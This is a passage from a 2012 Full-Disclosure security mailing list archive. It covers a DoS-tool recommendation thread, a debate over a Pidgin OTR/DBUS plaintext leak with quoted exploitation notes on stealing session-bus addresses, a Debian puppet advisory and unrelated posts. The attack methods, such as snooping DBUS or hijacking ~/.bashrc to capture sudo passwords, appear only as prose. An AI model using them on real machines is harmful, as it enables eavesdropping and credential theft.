v+b7OBlLmKoU6HwofNajlVop7VZXdQicykLxfxTi0CnRhbOb1++cz4XqqHxHqzhj xR/bg0Cm3IQoPd5bhT03W6X+f9IvwVHhU3JLaBUqAVVNtGJ/mx05E0gvaXK5Iguw dFdv+/f798rDpQUAHA8QMA0dJ92/xdVJfAWHUFhN9OdF157kAsc8VRRq6IuIOr5Q VmRHPZHe1yci+sUS2nUyY5VdcHE3Vga2iZWXIitketWBAqs0XqikszIe4wko2MzJ xWST4+D0/ytG+w2f6J/F71NSwWNCRm/Q368bNkmqmxGajFSHCje+1fSQ7UlM6tSh iua5IZcTynbRV9XPVPhYaulpGmXZYZ8yiB7kJF+Y/aTe/RxGcbquPVwRUFgEHGkn TbXktN2hrcrA847c89LY0kwWsf9QLInCp/TavaV7jTcv4qLHSozRDt2mYna7TZs7 N6g76fCwA1ojowPvf9gHq4CtEUH+onVQViaUCj59eu+w6LlmW0kkTK9pQM0RAneN dtKHcxn02AVSAY4ftsBNEFbUgoMrTqlc8aChDTvgpnN9kEmyMnUxuDjefbjk88gU vRXGe1rldD0mOXJ5RoDf =6I4a -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Best DoS Tool
Good one - http://t50.sourceforge.net/ On Mon, Feb 27, 2012 at 8:35 AM, Ferenc Kovacs tyr...@gmail.com wrote: On Mon, Feb 27, 2012 at 4:35 AM, Manuel Moreno insecurech...@gmail.comwrote: Hi List!! I made some research about DoS Tools for my regulars PenTesting. What is considered the best tool for DoS? I made some test with scapy with god results. Wouldn't be the purpose of your research to answer that question? -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ћiago ₢uz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] pidgin OTR information leakage
2012/2/25 Dimitris Glynos dimit...@census-labs.com: Pidgin transmits OTR (off-the-record) conversations over DBUS in plaintext. This makes it possible for attackers that have gained user-level access on a host, to listen in on private conversations associated with the victim account. Basically, you're saying that if I have the rights of a user on a machine, I can access the private conversations of that user? Ooooh no. Well, I can also copy his keyfiles, no? And I can alter his settings. And spawn fake Update didn't work, please enter root password to proceed windows. I could alter his ~/.bashrc so that whenever he launches sudo or su, a script is launched instead that grabs his password. So, please, what's the point? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] pidgin OTR information leakage
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Jann Horn wrote: 2012/2/25 Dimitris Glynos dimit...@census-labs.com: Pidgin transmits OTR (off-the-record) conversations over DBUS in plaintext. This makes it possible for attackers that have gained user-level access on a host, to listen in on private conversations associated with the victim account. Basically, you're saying that if I have the rights of a user on a machine, I can access the private conversations of that user? Ooooh no. Well, I can also copy his keyfiles, no? And I can alter his settings. And spawn fake Update didn't work, please enter root password to proceed windows. I could alter his ~/.bashrc so that whenever he launches sudo or su, a script is launched instead that grabs his password. So, please, what's the point? I think you didn't understood the content of the advisory. If there are 10 non-root users in an Ubuntu machine for example, if user 1 is using pidgin with OTR compiled with DBUS, then user 2 to 10 can see what user 1 pidgin conversation. Simple as that, without impersonating user 1 or knowing his password. Cheers antisnatchor ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEcBAEBAgAGBQJPS9tfAAoJEBgl8Z+oSxe4fv8IAIHrER/TssgDxUmQrpcs11Ud eYdxLG897aa7plBwi8bABSVR/0moO4cH0w3dvcgIYJ1kSlxiy6NLqlGi9SF6biAx Yw4uDDeaQggO9CMS8FX/Dn8JNhZUxQ47C0M4hydd8Irg5FPPUBRDcXkcH5MjI35v GcbSx2MEN5YrSvn4C6z2M3MJcuyhROlWfsa68cBc3EVIe4CjWTK1NLxCidXLrn8V aXtGOpnrXZPoJeNjhCQGvhnAUMdn2W5PQjF24f6hzqb8vHkF7Y0ZunD9IxoWhnMU sNGCcUNAEEDXfGUV6LtkwZOP1l6W7bZTRNqT7C8Jsp/K4Pfbit+ALXIhIlQZCds= =zebT -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2419-1] puppet security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2419-1 secur...@debian.org http://www.debian.org/security/Florian Weimer February 27, 2012 http://www.debian.org/security/faq - - Package: puppet Vulnerability : several Problem type : local Debian-specific: no CVE ID : CVE-2012-1053 CVE-2012-1054 Two vulnerabilities were discovered in Puppet, a centralized configuration management tool. CVE-2012-1053 Puppet runs execs with an unintended group privileges, potentially leading to privilege escalation. CVE-2012-1054 The k5login type writes to untrusted locations, enabling local users to escalate their privileges if the k5login type is used. For the stable distribution (squeeze), these problems have been fixed in version 2.6.2-5+squeeze4. For the testing distribution (wheezy) and the unstable distribution (sid), these problems have been fixed in version 2.7.11-1. We recommend that you upgrade your puppet packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJPS+FdAAoJEL97/wQC1SS+ZQQIAJSwK65I2Zu3vbszCf0Ba+AP hVHLLNdyA56clrDwvqhIf7jncAY9BrkykVkML2fu8K8Zn8hn96r4GyZ1MkzWMBqK Smf4tZTEr1fD0QGbXLmHCZGMosdZVg6RJtBwhfwG8QNBYjspBBzaQ0kixHMHxiam KkYSuFcc1oLfVhJe0ubIIy30mIinaEpLQ6Sxhe75Cm8aIq7gUG60LSlxI5auKBZu w4U52CRdfZPd8I0UIswudD9hEW8Chr7hfq9yBiANXhB8lHyFMpf9nrUNhiC7oAtK i3GWGrKm71paTrS9aMva4c73/Mz9zqMlI905Nt0OgGJqMxqXbxOkE9YrjgKaQ5g= =90wL -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Soft skills needed for an information security career?
Two people can interview for a position who look to be nearly equal in terms of experience, yet a hiring manager comes away with a strong recommendation to hire one and not the other. Or sometimes there are even instances in which someone may appear to be even stronger in terms of experience and training, and yet someone else gets the job. Setting aside potential discrimination issues, a very valid difference could be what some would call soft skills, or behavioral skills. These skills are the intangibles that really pull everything together and drive someone's success or failure in a role. Read more at: http://resources.infosecinstitute.com/soft-skills-hiring/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] pidgin OTR information leakage
On Mon, Feb 27, 2012 at 3:21 PM, Rich Pieri rati...@mit.edu wrote: On Feb 27, 2012, at 2:37 PM, Michele Orru wrote: I think you didn't understood the content of the advisory. If there are 10 non-root users in an Ubuntu machine for example, if user 1 is using pidgin with OTR compiled with DBUS, then user 2 to 10 can see what user 1 pidgin conversation. This is not what the OP or CVE describe: plaintext. This makes it possible for attackers that have gained user-level access on a host, to listen in on private conversations associated with the victim account. Which I read as: if I compromise user1's account then I can snoop user1's DBUS sessions. It says nothing about me being able to snoop user2's sessions. The leading phrase about attackers gaining user-level access implies that legitimate users on a system are not a relevant issue. I tend to agree with you, and question if that is in fact true (it may well be, my apologies in advance). DBUS is on my list of things to probe, prod, and attatck due to data sharing. But I'd be really surprised if data was available across distinct user sessions. Unix/Linux are usually very good a separating processes and sessions so that data does not comingle. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] pidgin OTR information leakage
On Mon, Feb 27, 2012 at 10:27 PM, Jeffrey Walton noloa...@gmail.com wrote: On Mon, Feb 27, 2012 at 3:21 PM, Rich Pieri rati...@mit.edu wrote: On Feb 27, 2012, at 2:37 PM, Michele Orru wrote: I think you didn't understood the content of the advisory. If there are 10 non-root users in an Ubuntu machine for example, if user 1 is using pidgin with OTR compiled with DBUS, then user 2 to 10 can see what user 1 pidgin conversation. This is not what the OP or CVE describe: plaintext. This makes it possible for attackers that have gained user-level access on a host, to listen in on private conversations associated with the victim account. Which I read as: if I compromise user1's account then I can snoop user1's DBUS sessions. It says nothing about me being able to snoop user2's sessions. The leading phrase about attackers gaining user-level access implies that legitimate users on a system are not a relevant issue. I tend to agree with you, and question if that is in fact true (it may well be, my apologies in advance). DBUS is on my list of things to probe, prod, and attatck due to data sharing. But I'd be really surprised if data was available across distinct user sessions. Unix/Linux are usually very good a separating processes and sessions so that data does not comingle. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Exploitation Notes For the purpose of explaining the exploitation impact of this bug we will focus on a popular libpurple-based application, Pidgin. To snoop in on a Pidgin user’s conversation a remote attacker would need to connect to the DBUS daemon that is responsible for the user’s session. There are at least two ways to achieve this. The first one is to exploit an application that runs within the same desktop session as Pidgin. This application would have inherited the necessary DBUS_SESSION_BUS_ADDRESS environmental variable and will thus be able to connect to the DBUS daemon over a unix socket without a problem. The second way is to compromise the user’s account in some way and steal the DBUS_SESSION_BUS_ADDRESS value. There are multiple ways of acquiring the value for this variable, one of them being through /proc/pid/environ(which is accessible to processes of the same owner), and another being through a file in ~/.dbus/session-bus/. Using this value, the attacker will now be able to connect to DBUS with applications that are not part of the desktop session. Please note that the above methods do not require any control over the Pidgin process (ptrace or other). so you either need to able to dump the environment variable from a process run by the victim, or read files which AFAIK only the victim(and root ofc) has access to. did I miss anything? -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Eleventh Circuit Finds Fifth Amendment Right Against Self Incrimination Protects Against Being Forced to Decrypt Hard Drive Contents
On 2/27/2012 12:11 PM, valdis.kletni...@vt.edu wrote: On Mon, 27 Feb 2012 01:38:56 MST, Sanguinarious Rose said: This isn't anything new Yeah, the decision was released all the way back on Feb 23, four whole days ago, that's practically last century in Internet time... So tell me - what's your definition of new (obviously significantly less than 4 days), and how does it affect threads on F-D that last longer than 4 days? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ not told [ ] Told [x] oh snap ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/